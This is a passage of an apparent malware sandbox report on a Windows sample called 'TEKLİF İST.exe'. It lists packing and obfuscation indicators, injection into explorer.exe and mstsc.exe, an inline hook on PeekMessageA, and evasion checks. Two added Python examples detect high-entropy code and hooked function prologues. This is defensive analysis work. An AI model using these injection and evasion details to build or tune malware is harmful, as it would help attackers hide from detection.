          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041D4DB push eax; ret 4_2_0041D542
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041D485 push eax; ret 4_2_0041D4D8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041D53C push eax; ret 4_2_0041D542
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B1225F pushad ; ret 4_2_01B127F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B127FA pushad ; ret 4_2_01B127F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B409AD push ecx; mov dword ptr [esp], ecx 4_2_01B409B6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B1283D push eax; iretd 4_2_01B12858
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B1B008 push es; iretd 4_2_01B1B009
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B11200 push eax; iretd 4_2_01B11369
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B19939 push es; iretd 4_2_01B19940
          Source: C:\Windows\explorer.exe | Code function: 6_2_0DEAF9B5 push esp; retn 0000h 6_2_0DEAFAE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_0DEAFB02 push esp; retn 0000h 6_2_0DEAFB03
          Source: C:\Windows\explorer.exe | Code function: 6_2_0DEAFB1E push esp; retn 0000h 6_2_0DEAFB1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_0EA0CB02 push esp; retn 0000h 6_2_0EA0CB03
          Source: C:\Windows\explorer.exe | Code function: 6_2_0EA0CB1E push esp; retn 0000h 6_2_0EA0CB1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_0EA0C9B5 push esp; retn 0000h 6_2_0EA0CAE7
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_00889064 push ecx; ret 8_2_00889077
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007792D4 pushad ; retf 8_2_007792D5
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007792D0 push eax; retf 8_2_007792D1
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007792A8 push eax; retf 000Fh 8_2_007792A9
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_00775550 pushfd ; retn 0077h 8_2_00775551
          Source: TEKL#U0130F #U0130ST.exe | Static PE information: section name: .text entropy: 7.59023926160002
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, BCrQGsqvPdUStWsBTF.cs | High entropy of concatenated method names: 'GxDY9spGrN', 'hhYY2QJabx', 'kYgY6T85nS', 'MmOYU6dt3Z', 'Bg9YVnxeQC', 'DI4YJRvmMW', 'giEUCSGtcyFpHa1kcr', 'BCuO8ok9UsrfPsUv6v', 'WhbYYKAt5A', 'at4YhhfLC6'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, RdBPx03YDSZvyu5ICnD.cs | High entropy of concatenated method names: 'OR4nQlt7Gf', 'FEOnsBkVSt', 'pb9na0bTuH', 'WuGnHrUsJA', 'C8Qnf6TOtp', 'wMlnrRXS5a', 'WZdnEF7U40', 'xTInbT8R2s', 'TuGnvbmRmZ', 'kOQnMyg40x'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, ibOEfqxxUjtRwYjuxF.cs | High entropy of concatenated method names: 'nAUOokVmgl', 'tQtO0euI6X', 'XlbO7EPgjE', 'YLFO99pBxF', 'PCaO2DRkS2', 'roJ7W1fQu3', 'm0h7phBK8Q', 'GCn7RT2Clh', 'kQS7DIJiJ0', 'TNU7uf0JC2'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, eDTX6S33VGLGAsL4lRj.cs | High entropy of concatenated method names: 'ToString', 'kdb8h0yPIe', 'bBM8qHRJ1M', 'nTg8ofUWHS', 'QHr8TNlAC1', 'gkE80fi8wR', 'm2q8KPwVwy', 'bPQ87l4MSV', 'lI7P326XBOUmy1MapVK', 'DswoQF6KT8YcMf2SxXL'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, Gu6jH1KHT2aaVqnGJC.cs | High entropy of concatenated method names: 'Wv3GbiGIuT', 'onZGvy20U0', 'dYAGkYvqK5', 'tLiGiofXcG', 'kqyGL7CNWN', 'yq5GtIKpee', 'QYqGCuqVtb', 'C1LGPY2Ow4', 'vrBGI7Brui', 'YG9GZgQsUT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, CpXuqheKeNcOl2gM1t.cs | High entropy of concatenated method names: 'HCW9TcjaUu', 'pci9KDPDcS', 'sCs9OIgjmE', 'j1ZOc4Bdpr', 'SSFOz0YgpG', 'InK91MXTo0', 'uog9YY8u6Q', 'eg79NJ8wNN', 'gLK9hB217i', 'owx9qG5KgS'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, pNi9qYEPka9rt5br50.cs | High entropy of concatenated method names: 'wk5xDjW5Jj', 'XJpxcpuMCF', 'u7q31Jad3P', 'ACu3YZhXd9', 'iI1xZL60C6', 'qlyxAk2TdU', 'U8TxeKcRXN', 'PPMxjdVIBE', 'WE6xgigPvw', 'nQsxBe3Mbh'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, cCXDhPnYieu7sLXkQZ.cs | High entropy of concatenated method names: 'Ace0jdUdUL', 'QIy0gEZ24S', 'g6E0Bgc8u4', 'hyH0mnnruk', 'SUu0Wdg61C', 'IAQ0prqQWg', 'ggx0RZ1sqt', 'JqS0DiOmqf', 'FPD0uIL0bG', 'ifd0cFX8SC'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, oEx3AcJSlo38dsWwUD.cs | High entropy of concatenated method names: 'J05aH5Elc', 'qfjHtTYHv', 'VbKr2xJnf', 'yanEgXEhG', 'j6Zv0HxZR', 'VDqMJn9Pn', 'Q5K4OyKWO1s5O2sQHg', 'Wy2T8LBRUwynB9s9nn', 'NMQ3BToFD', 'TuS8EIKrY'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, nFFUXqHlVSKFgwBgWS.cs | High entropy of concatenated method names: 'uQBVIWwM19', 'XioVAs53CB', 'E2dVjhYpha', 'U3JVgnKiut', 'wSBViXbt9g', 'rvMVFCf0ys', 'fugVLdbTkt', 'OLOVtdAi9a', 'xosV5y8O8T', 'zJcVC801MR'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, S07V4koBSSy8qnyCAt.cs | High entropy of concatenated method names: 'MbE3k4qfkD', 'SHY3iKUbBB', 'nX33F5AdRv', 'Brp3L5yQO4', 'rPe3jZ2R7m', 'pPX3thBPc0', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, IfnAblaBLdQWkhCorN.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oUSNu9nfe2', 'loJNcUVtfR', 'OmCNzeXHbS', 'oHuh14Xa98', 'yvThYaFvfO', 'dvUhNKNrsY', 'vlKhhXewoJ', 'pdoTRWtrwE2KjF7Dves'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, VcyhQyiD2xkH0fXI2Z.cs | High entropy of concatenated method names: 'cxl7feVxjq', 'TDb7ExpJSm', 'FQ7KFEcshq', 'at5KLnGMd9', 'cwKKtMXFs3', 'Y7mK5f14Ya', 'MjbKCIlaZg', 'fTaKPpbxtN', 'rmSKlI1hhF', 'xIdKIq9beD'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, D3aJ9nhd632UudjdRf.cs | High entropy of concatenated method names: 'jWyKH9fCVr', 'xPFKrIX3Ta', 'HHLKbk9mbY', 'pg0KvU0sWS', 'fRhKVM8h8N', 'w43KJxRX4Y', 'HSTKx357n8', 'UqUK3GCecb', 'h0ZKnfS8Mg', 'Wp2K8GM7J5'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, BfG1TKQWfgmOliB4Uw.cs | High entropy of concatenated method names: 'lPUnYVPWkm', 'zA2nhjNY0Y', 'Bxqnq7KDe8', 'SGUnT4pDTy', 'UFJn0sL9L1', 'lGAn7Z6mvq', 'LrgnO1ePrE', 'o083RpZgj0', 'Jpk3DxXXEd', 'jZ13ux0Q4y'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, YIiILejVHVtoOOhYTE.cs | High entropy of concatenated method names: 'CRu3TyiUcM', 'oZf30jR9X4', 'PBe3KQ2Q4r', 'WGU37tcOec', 'x2Q3OjDoUY', 'D01396SUkF', 'j81321Ocm4', 'lBl3ycRdhM', 'buL36eka6k', 'BNl3UY6g7M'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | High entropy of concatenated method names: 'GLKhowAQDu', 'Re4hTNt19w', 'oj3h0LUVy7', 'J4RhKobdiV', 'bG9h7XlSl6', 'KJYhOIBi2n', 'pdph9GgvJ2', 'gmqh2TGRXX', 'zBNhym1orI', 'GK2h6m5q0D'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, rQHPQKwP5AfLbIMCuh.cs | High entropy of concatenated method names: 'bV29QqqI1q', 'kWQ9swQDVC', 'AnK9aBLpyL', 'oLl9H6yrrw', 'eja9f6jfeR', 'NPa9r8DyZZ', 'UhD9EXJtAX', 'iBe9bF7GFY', 'MbP9vvJJjp', 'kma9Mk4hCT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, DO6p58WyMYhYgejVx7.cs | High entropy of concatenated method names: 'Dispose', 'XdlYuC79wQ', 'IZINijLNyH', 'u9lXX3U2v9', 'yq2Yc2TSh0', 'nljYzpF2pR', 'ProcessDialogKey', 'otSN1tKJi7', 'VD7NYDfRa9', 'L6aNNJhMXW'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, BCrQGsqvPdUStWsBTF.cs | High entropy of concatenated method names: 'GxDY9spGrN', 'hhYY2QJabx', 'kYgY6T85nS', 'MmOYU6dt3Z', 'Bg9YVnxeQC', 'DI4YJRvmMW', 'giEUCSGtcyFpHa1kcr', 'BCuO8ok9UsrfPsUv6v', 'WhbYYKAt5A', 'at4YhhfLC6'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, RdBPx03YDSZvyu5ICnD.cs | High entropy of concatenated method names: 'OR4nQlt7Gf', 'FEOnsBkVSt', 'pb9na0bTuH', 'WuGnHrUsJA', 'C8Qnf6TOtp', 'wMlnrRXS5a', 'WZdnEF7U40', 'xTInbT8R2s', 'TuGnvbmRmZ', 'kOQnMyg40x'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, ibOEfqxxUjtRwYjuxF.cs | High entropy of concatenated method names: 'nAUOokVmgl', 'tQtO0euI6X', 'XlbO7EPgjE', 'YLFO99pBxF', 'PCaO2DRkS2', 'roJ7W1fQu3', 'm0h7phBK8Q', 'GCn7RT2Clh', 'kQS7DIJiJ0', 'TNU7uf0JC2'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, eDTX6S33VGLGAsL4lRj.cs | High entropy of concatenated method names: 'ToString', 'kdb8h0yPIe', 'bBM8qHRJ1M', 'nTg8ofUWHS', 'QHr8TNlAC1', 'gkE80fi8wR', 'm2q8KPwVwy', 'bPQ87l4MSV', 'lI7P326XBOUmy1MapVK', 'DswoQF6KT8YcMf2SxXL'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, Gu6jH1KHT2aaVqnGJC.cs | High entropy of concatenated method names: 'Wv3GbiGIuT', 'onZGvy20U0', 'dYAGkYvqK5', 'tLiGiofXcG', 'kqyGL7CNWN', 'yq5GtIKpee', 'QYqGCuqVtb', 'C1LGPY2Ow4', 'vrBGI7Brui', 'YG9GZgQsUT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, CpXuqheKeNcOl2gM1t.cs | High entropy of concatenated method names: 'HCW9TcjaUu', 'pci9KDPDcS', 'sCs9OIgjmE', 'j1ZOc4Bdpr', 'SSFOz0YgpG', 'InK91MXTo0', 'uog9YY8u6Q', 'eg79NJ8wNN', 'gLK9hB217i', 'owx9qG5KgS'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, pNi9qYEPka9rt5br50.cs | High entropy of concatenated method names: 'wk5xDjW5Jj', 'XJpxcpuMCF', 'u7q31Jad3P', 'ACu3YZhXd9', 'iI1xZL60C6', 'qlyxAk2TdU', 'U8TxeKcRXN', 'PPMxjdVIBE', 'WE6xgigPvw', 'nQsxBe3Mbh'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, cCXDhPnYieu7sLXkQZ.cs | High entropy of concatenated method names: 'Ace0jdUdUL', 'QIy0gEZ24S', 'g6E0Bgc8u4', 'hyH0mnnruk', 'SUu0Wdg61C', 'IAQ0prqQWg', 'ggx0RZ1sqt', 'JqS0DiOmqf', 'FPD0uIL0bG', 'ifd0cFX8SC'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, oEx3AcJSlo38dsWwUD.cs | High entropy of concatenated method names: 'J05aH5Elc', 'qfjHtTYHv', 'VbKr2xJnf', 'yanEgXEhG', 'j6Zv0HxZR', 'VDqMJn9Pn', 'Q5K4OyKWO1s5O2sQHg', 'Wy2T8LBRUwynB9s9nn', 'NMQ3BToFD', 'TuS8EIKrY'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, nFFUXqHlVSKFgwBgWS.cs | High entropy of concatenated method names: 'uQBVIWwM19', 'XioVAs53CB', 'E2dVjhYpha', 'U3JVgnKiut', 'wSBViXbt9g', 'rvMVFCf0ys', 'fugVLdbTkt', 'OLOVtdAi9a', 'xosV5y8O8T', 'zJcVC801MR'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, S07V4koBSSy8qnyCAt.cs | High entropy of concatenated method names: 'MbE3k4qfkD', 'SHY3iKUbBB', 'nX33F5AdRv', 'Brp3L5yQO4', 'rPe3jZ2R7m', 'pPX3thBPc0', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, IfnAblaBLdQWkhCorN.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oUSNu9nfe2', 'loJNcUVtfR', 'OmCNzeXHbS', 'oHuh14Xa98', 'yvThYaFvfO', 'dvUhNKNrsY', 'vlKhhXewoJ', 'pdoTRWtrwE2KjF7Dves'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, VcyhQyiD2xkH0fXI2Z.cs | High entropy of concatenated method names: 'cxl7feVxjq', 'TDb7ExpJSm', 'FQ7KFEcshq', 'at5KLnGMd9', 'cwKKtMXFs3', 'Y7mK5f14Ya', 'MjbKCIlaZg', 'fTaKPpbxtN', 'rmSKlI1hhF', 'xIdKIq9beD'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, D3aJ9nhd632UudjdRf.cs | High entropy of concatenated method names: 'jWyKH9fCVr', 'xPFKrIX3Ta', 'HHLKbk9mbY', 'pg0KvU0sWS', 'fRhKVM8h8N', 'w43KJxRX4Y', 'HSTKx357n8', 'UqUK3GCecb', 'h0ZKnfS8Mg', 'Wp2K8GM7J5'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, BfG1TKQWfgmOliB4Uw.cs | High entropy of concatenated method names: 'lPUnYVPWkm', 'zA2nhjNY0Y', 'Bxqnq7KDe8', 'SGUnT4pDTy', 'UFJn0sL9L1', 'lGAn7Z6mvq', 'LrgnO1ePrE', 'o083RpZgj0', 'Jpk3DxXXEd', 'jZ13ux0Q4y'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, YIiILejVHVtoOOhYTE.cs | High entropy of concatenated method names: 'CRu3TyiUcM', 'oZf30jR9X4', 'PBe3KQ2Q4r', 'WGU37tcOec', 'x2Q3OjDoUY', 'D01396SUkF', 'j81321Ocm4', 'lBl3ycRdhM', 'buL36eka6k', 'BNl3UY6g7M'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | High entropy of concatenated method names: 'GLKhowAQDu', 'Re4hTNt19w', 'oj3h0LUVy7', 'J4RhKobdiV', 'bG9h7XlSl6', 'KJYhOIBi2n', 'pdph9GgvJ2', 'gmqh2TGRXX', 'zBNhym1orI', 'GK2h6m5q0D'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, rQHPQKwP5AfLbIMCuh.cs | High entropy of concatenated method names: 'bV29QqqI1q', 'kWQ9swQDVC', 'AnK9aBLpyL', 'oLl9H6yrrw', 'eja9f6jfeR', 'NPa9r8DyZZ', 'UhD9EXJtAX', 'iBe9bF7GFY', 'MbP9vvJJjp', 'kma9Mk4hCT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, DO6p58WyMYhYgejVx7.cs | High entropy of concatenated method names: 'Dispose', 'XdlYuC79wQ', 'IZINijLNyH', 'u9lXX3U2v9', 'yq2Yc2TSh0', 'nljYzpF2pR', 'ProcessDialogKey', 'otSN1tKJi7', 'VD7NYDfRa9', 'L6aNNJhMXW'
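Two of the heuristics behind the entries above are entropy measurements: the .text section scores 7.59 of a possible 8 bits per byte, and the same 19 classes in both memory dumps carry method names whose concatenation is flagged as high entropy. The following is an added example, not part of the Joe Sandbox report or its detection logic, reproducing both checks so the numbers can be interpreted. The two name lists are copied from the entries above; the byte strings and both thresholds are constructed assumptions (compiled x86 code usually sits around 6 to 6.8 bits, compressed or encrypted data above 7; English identifiers around 4 bits, random alphanumerics approach log2(62), about 5.95).

```python
"""Entropy heuristics of the kind a sandbox applies to a sample.

Added example, not part of the Joe Sandbox report. Computes the Shannon
entropy of a PE section and of a .NET class's concatenated method names.
Both thresholds are assumptions chosen for illustration.
"""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


PACKED_SECTION_THRESHOLD = 7.2      # assumed cut-off; the report's .text scored 7.59


def section_looks_packed(section: bytes, threshold: float = PACKED_SECTION_THRESHOLD) -> bool:
    """A code section this dense is more likely compressed or encrypted than compiled code."""
    return shannon_entropy(section) >= threshold


def method_name_entropy(names) -> float:
    """Entropy of one class's method names concatenated, as the report does."""
    return shannon_entropy("".join(names).encode("utf-8"))


OBFUSCATED_NAMES_THRESHOLD = 4.5    # assumed cut-off between English-like and random identifiers


def class_names_look_obfuscated(names, threshold: float = OBFUSCATED_NAMES_THRESHOLD) -> bool:
    """True when the names are closer to random alphanumerics (~5.95 bits) than to English (~4 bits)."""
    return method_name_entropy(names) >= threshold


def triage(names_by_class: dict, text_section: bytes) -> dict:
    """Summarise both heuristics for one sample as plain data."""
    flagged = [cls for cls, names in names_by_class.items() if class_names_look_obfuscated(names)]
    return {
        "text_entropy": round(shannon_entropy(text_section), 2),
        "text_packed": section_looks_packed(text_section),
        "obfuscated_classes": flagged,
        "class_count": len(names_by_class),
    }


# Sample inputs. The name lists are taken from the report entries above;
# the two byte strings are constructed here.
RANDOM_NAMES = ['GxDY9spGrN', 'hhYY2QJabx', 'kYgY6T85nS', 'MmOYU6dt3Z',
                'Bg9YVnxeQC', 'DI4YJRvmMW', 'giEUCSGtcyFpHa1kcr',
                'BCuO8ok9UsrfPsUv6v', 'WhbYYKAt5A', 'at4YhhfLC6']
READABLE_NAMES = ['ToString', 'Dispose', 'GetEditStyle', 'EditValue',
                  'ProcessDialogKey', 'Next', 'NextBytes']
UNIFORM_SECTION = bytes(range(256)) * 16    # every byte value equally likely: 8.0 bits
ZERO_SECTION = b"\x00" * 4096               # padding carries no information: 0.0 bits

if __name__ == "__main__":
    print(triage({"BCrQGsqvPdUStWsBTF": RANDOM_NAMES, "WinFormsHelper": READABLE_NAMES},
                 UNIFORM_SECTION))
```

Entropy alone does not distinguish a packer from a legitimately compressed resource, and framework method names such as ToString or Dispose survive renaming (they override base-class members), which is why the report still lists a few readable names inside otherwise random classes.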

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
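The entry above is the sandbox's inline-hook detector: the first bytes of user32!PeekMessageA in explorer.exe no longer match the on-disk image. The following is an added example, not part of the Joe Sandbox report, of the same check done by hand: compare a function's prologue as mapped from disk with the bytes in the live process, list the differing offsets, and recognise the trampoline encodings hooks commonly write (jmp rel32, jmp [rip+disp32], push/ret, mov rax/jmp rax). The prologue bytes, function address and patches are constructed for illustration; the code assumes x64 addressing for the rip-relative case.

```python
"""Inline-hook check: compare a function prologue on disk with the copy in memory.

Added example, not part of the Joe Sandbox report. All addresses and byte
strings are constructed; in practice `disk` comes from the mapped image
file and `mem` from ReadProcessMemory at the export's address.
"""
import struct
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

MASK64 = 0xFFFFFFFFFFFFFFFF


@dataclass
class HookReport:
    function: str
    modified: bool
    diffs: List[Tuple[int, int, int]] = field(default_factory=list)  # (offset, disk byte, memory byte)
    trampoline: Optional[str] = None   # recognised encoding, if any
    target: Optional[int] = None       # where the patched entry transfers control


def diff_prolog(disk: bytes, mem: bytes, length: int = 16) -> List[Tuple[int, int, int]]:
    """Byte-wise comparison of the first `length` bytes of a function."""
    n = min(length, len(disk), len(mem))
    return [(i, disk[i], mem[i]) for i in range(n) if disk[i] != mem[i]]


def classify_trampoline(code: bytes, va: int):
    """Recognise common hook entry sequences placed at `va`; returns (name, target) or (None, None).

    E9 rel32            jmp rel32             target = va + 5 + rel32
    FF 25 disp32        jmp qword [rip+disp]  x64: pointer slot at va + 6 + disp32
    68 imm32 C3         push imm32; ret       target = imm32
    48 B8 imm64 FF E0   mov rax, imm64; jmp rax
    """
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (va + 5 + rel) & MASK64
    if len(code) >= 6 and code[0] == 0xFF and code[1] == 0x25:
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (va + 6 + disp) & MASK64
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    return None, None


def check_function(name: str, va: int, disk: bytes, mem: bytes) -> HookReport:
    """Report whether the in-memory prologue differs from disk and what it now jumps to."""
    diffs = diff_prolog(disk, mem)
    if not diffs:
        return HookReport(name, False)
    kind, target = classify_trampoline(mem, va)
    return HookReport(name, True, diffs, kind, target)


# Constructed sample: a typical x64 prologue
# (mov [rsp+8], rbx; push rdi; sub rsp, 20h; mov rbx, rcx; mov rdi, rdx)
CLEAN_PROLOG = bytes.fromhex("48895C2408574883EC20488BD9488BFA")
FUNC_VA = 0x00007FF812340000               # constructed address of the export


def hooked_with(trampoline: bytes) -> bytes:
    """Overwrite the start of the clean prologue, as an inline hook does."""
    return trampoline + CLEAN_PROLOG[len(trampoline):]


JMP_REL32 = b"\xE9" + struct.pack("<i", 0x1000)                        # jmp +0x1000
PUSH_RET = b"\x68" + struct.pack("<I", 0x7FFE1000) + b"\xC3"            # push 0x7FFE1000; ret
MOV_JMP = b"\x48\xB8" + struct.pack("<Q", 0x00007FF8AAAA0000) + b"\xFF\xE0"

if __name__ == "__main__":
    for patch in (b"", JMP_REL32, PUSH_RET, MOV_JMP, b"\x90\x90"):
        print(check_function("PeekMessageA", FUNC_VA, CLEAN_PROLOG, hooked_with(patch)))
```

A modified prologue is a lead, not a verdict: EDR agents, application-compatibility shims and Detours-style instrumentation patch the same bytes legitimately, so the target address should be resolved to a module before the change is attributed to the injected code in explorer.exe.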
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A60E0 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,memset,GetTitleBarInfo,GetCursorPos
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A00AA IsIconic,GetWindowPlacement,GetLastError
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A0150 IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A5355 GetWindowRect,GetWindowLongW,GetWindowLongW,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A342A IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0079D66C IsIconic,GetWindowPlacement,GetWindowRect
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A4630 lstrcmpW,LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,VariantInit,VariantClear,VariantClear,GetRgnBox,OffsetRgn,VariantClear,ShowWindow,SetWindowPos,SetWindowPos,SetWindowRgn,LockWindowUpdate
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A2687 DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,DefWindowProcW
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007A587D IsWindowVisible,IsIconic
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0080C997 GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007DBCF0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Process information set: NOOPENFILEERRORBOX (44 identical entries)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 6148, type: MEMORYSTR
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API/Special instruction interceptor: Address: 7FFBCB7AD1E4
